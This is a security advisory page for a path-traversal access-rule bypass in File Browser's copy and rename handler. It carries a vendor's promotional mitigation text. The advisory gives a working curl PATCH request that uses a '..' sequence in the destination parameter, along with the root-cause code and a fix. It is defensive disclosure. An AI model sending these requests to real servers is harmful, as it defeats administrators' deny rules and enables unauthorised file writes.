GHSA-9f3r-2vgw-m8xp
MEDIUMFile Browser has an Access Rule Bypass via Path Traversal in Copy/Rename Destination Parameter
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/filebrowser/filebrowser/v2Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Description
The resourcePatchHandler in http/resource.go validates the destination path against configured access rules before the path is cleaned/normalized. The rules engine (rules/rules.go) uses literal string prefix matching (strings.HasPrefix) or regex matching against the raw path. The actual file operation (fileutils.Copy, patchAction) subsequently calls path.Clean() which resolves .. sequences, producing a different effective path than the one validated.
This allows an authenticated user with Create or Rename permissions to bypass administrator-configured deny rules by including .. (dot-dot) path traversal sequences in the destination query parameter of a PATCH request.
Steps to Reproduce
1. Verify the rule works normally
# This should return 403 Forbidden
curl -X PATCH \
-H "X-Auth: <alice_jwt>" \
"http://host/api/resources/public/test.txt?action=copy&destination=%2Frestricted%2Fcopied.txt"
2. Exploit the bypass
# This should succeed despite the deny rule
curl -X PATCH \
-H "X-Auth: <alice_jwt>" \
"http://host/api/resources/public/test.txt?action=copy&destination=%2Fpublic%2F..%2Frestricted%2Fcopied.txt"
3. Result
The file test.txt is copied to /restricted/copied.txt despite the deny rule for /restricted/.
Root Cause Analysis
In http/resource.go:209-257:
dst := r.URL.Query().Get("destination") // line 212
dst, err := url.QueryUnescape(dst) // line 214 — dst contains ".."
if !d.Check(src) || !d.Check(dst) { // line 215 — CHECK ON UNCLEANED PATH
return http.StatusForbidden, nil
}
In rules/rules.go:29-35:
func (r *Rule) Matches(path string) bool {
if r.Regex {
return r.Regexp.MatchString(path) // regex on literal path
}
return strings.HasPrefix(path, r.Path) // prefix on literal path
}
In fileutils/copy.go:12-17:
func Copy(afs afero.Fs, src, dst string, ...) error {
if dst = path.Clean("/" + dst); dst == "" { // CLEANING HAPPENS HERE, AFTER CHECK
return os.ErrNotExist
}
The rules check sees /public/../restricted/copied.txt (no match for /restricted/ prefix).
The file operation resolves it to /restricted/copied.txt (within the restricted path).
Secondary Issue
In the same handler, the error from url.QueryUnescape is checked after d.Check() runs (lines 214-220), meaning the rules check executes on a potentially malformed string if unescaping fails.
Impact
An authenticated user with Copy (Create) or Rename permission can write or move files into any path within their scope that is protected by deny rules. This bypasses both:
- Prefix-based rules:
strings.HasPrefixon uncleaned path misses the match - Regex-based rules: Standard patterns like
^/restricted/.*fail on uncleaned path
Cannot be used to:
- Escape the user's BasePathFs scope (afero prevents this)
- Read from restricted paths (GET handler uses cleaned
r.URL.Path)
Suggested Fix
Clean the destination path before the rules check:
dst, err := url.QueryUnescape(dst)
if err != nil {
return errToStatus(err), err
}
dst = path.Clean("/" + dst)
src = path.Clean("/" + src)
if !d.Check(src) || !d.Check(dst) {
return http.StatusForbidden, nil
}
if dst == "/" || src == "/" {
return http.StatusForbidden, nil
}
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/filebrowser/filebrowser/v2 | all versions | 2.62.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/filebrowser/filebrowser/v2. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/filebrowser/filebrowser/v2 to 2.62.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9f3r-2vgw-m8xp is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-9f3r-2vgw-m8xp is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-9f3r-2vgw-m8xp. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-9f3r-2vgw-m8xp in your dependencies?
O3 detects GHSA-9f3r-2vgw-m8xp across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.